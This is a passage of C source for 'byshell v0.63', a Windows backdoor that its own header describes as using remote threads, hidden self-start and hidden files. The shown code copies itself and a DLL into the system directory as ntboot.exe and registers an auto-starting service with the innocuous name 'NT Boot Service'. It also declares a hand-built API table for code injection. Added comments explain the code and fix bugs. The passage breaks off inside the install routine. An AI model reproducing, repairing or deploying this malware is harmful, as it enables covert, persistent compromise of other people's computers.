//byshell v0.63,remote thread + hidden self start + hidden file
//记得改名为ntboot.exe
/**************************************************************
Redesigned packet header: a BYheader on every instance, for reliable transfer.
16 BYTE password
8 BYTE reserved
4 BYTE packnum
4 BYTE packlength
解决:密码(drop conn),分片(solve here),丢包,错包(pass an "packet dropped\n" to work)
***************************************************************/
#include <stdio.h>
#pragma comment(lib, "ws2_32.lib")
#pragma comment(lib, "kernel32.lib")
#include <winsock2.h>
#include <stdlib.h>
#include <tlhelp32.h>
#include <Ws2tcpip.h>
#include <time.h>
#include <string.h>
//1Q subsystem
//general work functions needed, "work.h"
//define an external struct for shell, get/put, DOS
//passdump only in 9x
/* Process-wide service state. Written by CmdStart and CmdControl and
 * handed to SetServiceStatus; nothing else in the visible file touches it. */
SERVICE_STATUS ServiceStatus;
/* Handle returned by RegisterServiceCtrlHandler in CmdStart; zero until
 * CmdStart has run, and CmdControl uses it without re-checking. */
SERVICE_STATUS_HANDLE ServiceStatusHandle;
/* ServiceMain for the "NtBoot" entry in main's dispatch table. */
void WINAPI CmdStart(DWORD,LPTSTR *);
/* CmdControl: SCM control handler registered by CmdStart.
 * CmdService: worker started on its own thread by CmdStart; its body is
 * not in this part of the file. */
void WINAPI CmdControl(DWORD);DWORD WINAPI CmdService(LPVOID);
/* Reached from main on "-install": copies the executable into the system
 * directory and registers/starts the service (see InstallCmdService). */
void InstallCmdService(void);
/* Reached from main on "-remove"; body not visible here. */
void RemoveCmdService(void);
/* Declared only; the one call site in main is commented out and no
 * definition appears in this part of the file. */
void injcode();
/* Table of function pointers whose names and signatures mirror six kernel32
 * exports (LoadLibrary, GetProcAddress, VirtualAlloc, FreeLibrary,
 * IsBadReadPtr, VirtualFree). No function visible in this file fills or
 * reads the global instance; presumably it is consumed by injcode(), which
 * is declared but not defined here -- confirm against the rest of the file.
 * For a defender, a hand-built table like this (plain function pointers
 * rather than an import-table entry) is the artifact worth noting. */
struct INJAPISTR{
HINSTANCE (__stdcall*myLoadLibrary)(LPCTSTR);
FARPROC (__stdcall*myGetProcAddress)(HMODULE,LPCTSTR);
LPVOID (__stdcall*myVirtualAlloc)(LPVOID lpAddress,DWORD dwSize,DWORD flAllocationType,DWORD flProtect);
BOOL (__stdcall*myFreeLibrary)(HMODULE hLibModule);
BOOL (__stdcall*myIsBadReadPtr)(CONST VOID *lp,UINT ucb);
BOOL (__stdcall*myVirtualFree)(LPVOID lpAddress,DWORD dwSize,DWORD dwFreeType);
}injapistr; /* single global instance; never written in the visible code */
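/*
 * Entry point.
 *
 * With exactly one argument, "-install" or "-remove" (compared
 * case-insensitively) runs the matching helper and exits; any other single
 * argument prints an error. With zero or two-or-more arguments the process
 * hands itself to the service control manager, which is how the "NtBoot"
 * service (CmdStart) is entered.
 *
 * Returns 0 in every case; problems are reported on stdout only.
 *
 * Fix vs. the original: the error message was misspelled ("invailid"), and
 * a failing StartServiceCtrlDispatcher (which is what happens when the
 * binary is run from a console instead of by the SCM) now says so instead
 * of exiting silently.
 */
int main(int argc,char *argv[])
{
    /* Service name / ServiceMain pair handed to the SCM. The name must match
     * the one CmdStart passes to RegisterServiceCtrlHandler. */
    SERVICE_TABLE_ENTRY DispatchTable[] =
    {
        {"NtBoot",CmdStart},
        {NULL ,NULL }
    };
    if(argc==2)
    {
        if(!stricmp(argv[1],"-install"))
        {
            InstallCmdService();
            return 0;
        }
        if(!stricmp(argv[1],"-remove"))
        {
            RemoveCmdService();
            return 0;
        }
        printf("invalid parameter\n");
        return 0;
    }
    /* The original author noted that code can run here before the
     * dispatcher takes over and experimented with calling injcode() at this
     * point; that call was removed ("we find problem") and is not restored. */
    if(StartServiceCtrlDispatcher(DispatchTable)==0)
    {
        /* Not started by the SCM (or the dispatch table was rejected). */
        printf("StartServiceCtrlDispatcher failed, error %lu\n",(unsigned long)GetLastError());
    }
    return 0;
}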
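/*
 * ServiceMain for "NtBoot".
 *
 * Fills the global ServiceStatus, registers CmdControl as the control
 * handler, reports RUNNING to the SCM and then starts CmdService on a
 * worker thread. dwArgc/lpArgv are the SCM-supplied arguments and are not
 * used. Returns without reporting anything if the handler cannot be
 * registered or the first SetServiceStatus fails.
 *
 * Fixes vs. the original: the thread handle from CreateThread was never
 * closed (a handle leak for the life of the process), and a failed
 * CreateThread left the service reported RUNNING with no worker behind it.
 * The handle is now closed once the worker exists, and on failure the
 * service reports STOPPED with the Win32 error so the SCM sees a failure
 * instead of a running service that does nothing.
 */
void WINAPI CmdStart(DWORD dwArgc,LPTSTR *lpArgv)
{
    (void)dwArgc;
    (void)lpArgv;
    /* SERVICE_WIN32 here vs. SERVICE_WIN32_OWN_PROCESS at install time;
     * SERVICE_WIN32 covers both own- and share-process, so the SCM accepts
     * it, but the two could be made to agree. */
    ServiceStatus.dwServiceType = SERVICE_WIN32;
    ServiceStatus.dwCurrentState = SERVICE_START_PENDING;
    ServiceStatus.dwControlsAccepted = SERVICE_ACCEPT_PAUSE_CONTINUE|SERVICE_ACCEPT_STOP ;
    ServiceStatus.dwServiceSpecificExitCode = 0;
    ServiceStatus.dwWin32ExitCode = 0;
    ServiceStatus.dwCheckPoint = 0;
    ServiceStatus.dwWaitHint = 0;
    ServiceStatusHandle=RegisterServiceCtrlHandler("NtBoot",CmdControl);
    if(ServiceStatusHandle==0)
    {
        /* No handle means no way to report status; nothing more to do. */
        return ;
    }
    ServiceStatus.dwCurrentState = SERVICE_RUNNING;
    ServiceStatus.dwCheckPoint = 0;
    ServiceStatus.dwWaitHint = 0;
    if(SetServiceStatus(ServiceStatusHandle,&ServiceStatus)==0)
    {
        return ;
    }
    HANDLE hThread=CreateThread(NULL,0,CmdService,NULL,0,NULL);
    if(hThread==NULL)
    {
        /* Worker could not be created: tell the SCM rather than stay RUNNING. */
        ServiceStatus.dwCurrentState = SERVICE_STOPPED;
        ServiceStatus.dwWin32ExitCode = GetLastError();
        SetServiceStatus(ServiceStatusHandle,&ServiceStatus);
        return ;
    }
    /* The thread keeps running after its handle is closed; we only drop our
     * reference, which the original never did. */
    CloseHandle(hThread);
}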
/*
 * SCM control handler registered by CmdStart.
 *
 * PAUSE and CONTINUE only flip the reported state (the worker thread is not
 * actually suspended or resumed by this code). STOP reports STOPPED with a
 * zero exit code. INTERROGATE and unrecognised codes re-report the current
 * status unchanged. Every path ends with exactly one SetServiceStatus call
 * on the global ServiceStatusHandle; its result is not checked.
 */
void WINAPI CmdControl(DWORD dwCode)
{
    if(dwCode==SERVICE_CONTROL_PAUSE)
    {
        ServiceStatus.dwCurrentState = SERVICE_PAUSED;
    }
    else if(dwCode==SERVICE_CONTROL_CONTINUE)
    {
        ServiceStatus.dwCurrentState = SERVICE_RUNNING;
    }
    else if(dwCode==SERVICE_CONTROL_STOP)
    {
        /* Final report: the SCM treats STOPPED as the end of this service. */
        ServiceStatus.dwCurrentState = SERVICE_STOPPED;
        ServiceStatus.dwWin32ExitCode = 0;
        ServiceStatus.dwCheckPoint = 0;
        ServiceStatus.dwWaitHint = 0;
    }
    /* INTERROGATE and anything unknown fall through with the state untouched. */
    SetServiceStatus(ServiceStatusHandle,&ServiceStatus);
}
void InstallCmdService(void)
{char formerpath[255];char syspath[255];int ret;
ret=GetModuleFileName(0,formerpath,256);
GetSystemDirectory(syspath,256);
CopyFile(formerpath,strcat(syspath,"\\ntboot.exe"),0);
strcpy(formerpath+ret-10,"ntboot.dll");
GetSystemDirectory(syspath,256);
CopyFile(formerpath,strcat(syspath,"\\ntboot.dll"),0);
SC_HANDLE schSCManager;
SC_HANDLE schService;
char lpCurrentPath[MAX_PATH];
char lpImagePath[MAX_PATH];
WIN32_FIND_DATA FileData;
HANDLE hSearch;
DWORD dwErrorCode;
SERVICE_STATUS InstallServiceStatus;
//check if exist
GetSystemDirectory(lpImagePath,MAX_PATH);
strcat(lpImagePath,"\\ntboot.exe");
hSearch=FindFirstFile(lpImagePath,&FileData);
printf("Copying file ... ");
if(hSearch==INVALID_HANDLE_VALUE)
{
GetModuleFileName(NULL,lpCurrentPath,MAX_PATH);
if(CopyFile(lpCurrentPath,lpImagePath,FALSE)==0)
{
dwErrorCode=GetLastError();
if(dwErrorCode==5)
{
printf("Failure ... Access is Denied !\n");
}
else
{
printf("Failure !\n");
}
return ;
}
else
{
printf("Success !\n");
}
}
else
{
printf("already Exists !\n");
FindClose(hSearch);
}
schSCManager=OpenSCManager(0,NULL,SC_MANAGER_ALL_ACCESS);
printf("Creating Service .... ");
schService=CreateService(schSCManager,"NtBoot","NT Boot Service",SERVICE_ALL_ACCESS,
SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS,SERVICE_AUTO_START,
SERVICE_ERROR_IGNORE,"ntboot.exe",NULL,NULL,NULL,NULL,NULL);
if(schService==NULL)
{
dwErrorCode=GetLastError();
if(dwErrorCode!=ERROR_SERVICE_EXISTS)
{
printf("Failure !\n");
CloseServiceHandle(schSCManager);
return ;
}
else
{
printf("already Exists !\n");
schService=OpenService(schSCManager,"ntboot",SERVICE_START);
if(schService==NULL)
{
printf("Opening Service .... Failure !\n");
CloseServiceHandle(schSCManager);
return ;
}
}
}
else
{
printf("Success !\n");
}
printf("Starting Service .... ");
if(StartService(schService,0,NULL)==0)
{
dwErrorCode=GetLastError();
if(dwErrorCode==ERROR_SERVICE_ALREADY_RUNNING)
{
printf("already Running !\n");
CloseServiceHandle(schSCManager);
CloseServiceHandle(schService);
return ;
}
}
else
{
printf("Pending ... ");
}
while(QueryServiceStatus(schService,&InstallServiceStatus)!=0)
{
if(InstallServiceStatus.dwCurrentState==SERVICE_START_PENDING)
{
Sleep(100);
}
else
{
break;
}
}
if(InstallServiceStatus.dwCurrentState!=SERVICE_RUNNING)
{
printf("Failure !\n");
}
else